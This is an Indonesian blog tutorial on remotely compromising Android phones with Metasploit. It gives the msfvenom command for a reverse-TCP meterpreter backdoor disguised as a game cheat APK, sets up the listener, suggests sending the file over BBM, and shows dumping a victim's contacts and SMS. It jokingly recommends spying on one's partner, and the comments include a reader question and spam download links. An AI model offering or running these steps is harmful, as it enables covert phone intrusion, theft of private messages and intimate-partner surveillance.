Silahkan Melihat Tutorial di website kami dengan nyaman ENJOY YOUR LIFE ☕

HACK ANDROID BEDA JARINGAN MENGGUNAKAN METASPLOIT

HACK ANDROID BEDA JARINGAN MENGGUNAKAN METASPLOIT



ASSALLAMUALLAIKUM WR WB

Selamat Pagi kawan
Gw mau ucapin Selamat hari natal dan tahun baru bagi yang merayakannya :)
Semoga di tahun 2016 nanti kita menjadi orang yang lebih baik lagi
buka lembaran baru hapus semua cache kejelekan dan keburukan :)

Oke gw masih membahas Metasploit
tapi kali ini agak sedikit berbeda kawan
disini gw mau memberikan sedikit tutorial yang nggak penting banget :v
yaitu cara hack android menggunakan metasploit yang berbeda jaringan (SPY)
tentu saja harus beda jaringan karena jaringan handphone kebanyakan menggunakan data selular
Oke langsung saja

Setting port forward anda pada gateway
save & quit

contoh ini adalah gateway gw

pertama-tama buat dulu file backdoornya
buka terminal anda dan masukan perintah berikut
msfvenom -p android/meterpreter/reverse_tcp LHOST=180.252.XXX.XXX LPORT=7777 R> GemsCheater.apk
Note : 180.252.xxx.xxx adalah ip publik gw , jadi gunakan ip publik anda sendiri
7777 port gw, anda bisa menggantinya sampai 65000
GemsCheater adalah nama backdoor gw yang nanti akan di outputkan di file home dan apk adalah extensi khusus buat android

buka metasploit

msfconsole

use multi/handler

set LHOST 192.168.1.64

set LPORT 7777

exploit

Note : 192.168.1.64 adalah ip lokal gw
7777 adalah port yang gw sesuaikan pada backdoor yang di buat sebelumnya


kirim backdoor bisa melalui bbm juga loh.... :D
jika sudah di eksekusi oleh korban
maka meterpreter akan terlihat

masukan perintah

sysinfo

fungsinya untuk melihat informasi android korban




masukan perintah

help

untuk melihat options yang ingin anda gunakan

dan disini gw penasaran pada sms dan contact korban
jadi gw dumping smua kontak dan sms

dengan perintah

dump_contacts


dan smsnya

dump_sms


sebenernya gw mau nyalain camera, kirim sms melalui hp korban dll tapi sehubung batrai laptop gw udah sekarat jadi gw batalin

Cara ini bisa anda gunakan pada pasangan anda , jadi anda bisa memastikan dia selingkuh atau tidak :v
wkwkwkwkwkwk

SEKIAN DARI GW
JANGAN DISALAH GUNAKAN
KAMI TIDAK BERTANGGUNG JAWAB ATAS APA YANG ANDA LAKUKAN
INI HANYA PEMBELAJARAN SEMATA
HACKING NOT CRIMINAL
HACKING IS ART

Source : http://rextor404.blogspot.co.id/2015/12/hack-android-beda-jaringan-menggunakan.html




5 comments:

  1. kk...ip victim nya gmn?
    kita kan ga tau ip korban(asumsi hp yang menggunakan data selular)

    -apa setalah BD di execute langusng dapet ip nya?
    -apa kita harus cari tau sndiri>

    tks

    ReplyDelete
    Replies
    1. Error 404 (Not Found)!!1 >>>>> Download Now

      >>>>> Download Full

      Error 404 (Not Found)!!1 >>>>> Download LINK

      >>>>> Download Now

      Error 404 (Not Found)!!1 >>>>> Download Full

      >>>>> Download LINK KE

      Delete
  2. gan cara setting modem nya gimana ya? bisa bantu saya ga,buat setting modem zte f660 untuk exploit windows beda jaringan,kalo bisa add facebook saya fadlan bariqi

    ReplyDelete
  3. This comment has been removed by the author.

    ReplyDelete
  4. Error 404 (Not Found)!!1 >>>>> Download Now

    >>>>> Download Full

    Error 404 (Not Found)!!1 >>>>> Download LINK

    >>>>> Download Now

    Error 404 (Not Found)!!1 >>>>> Download Full

    >>>>> Download LINK

    ReplyDelete

HACK ANDROID BEDA JARINGAN MENGGUNAKAN METASPLOIT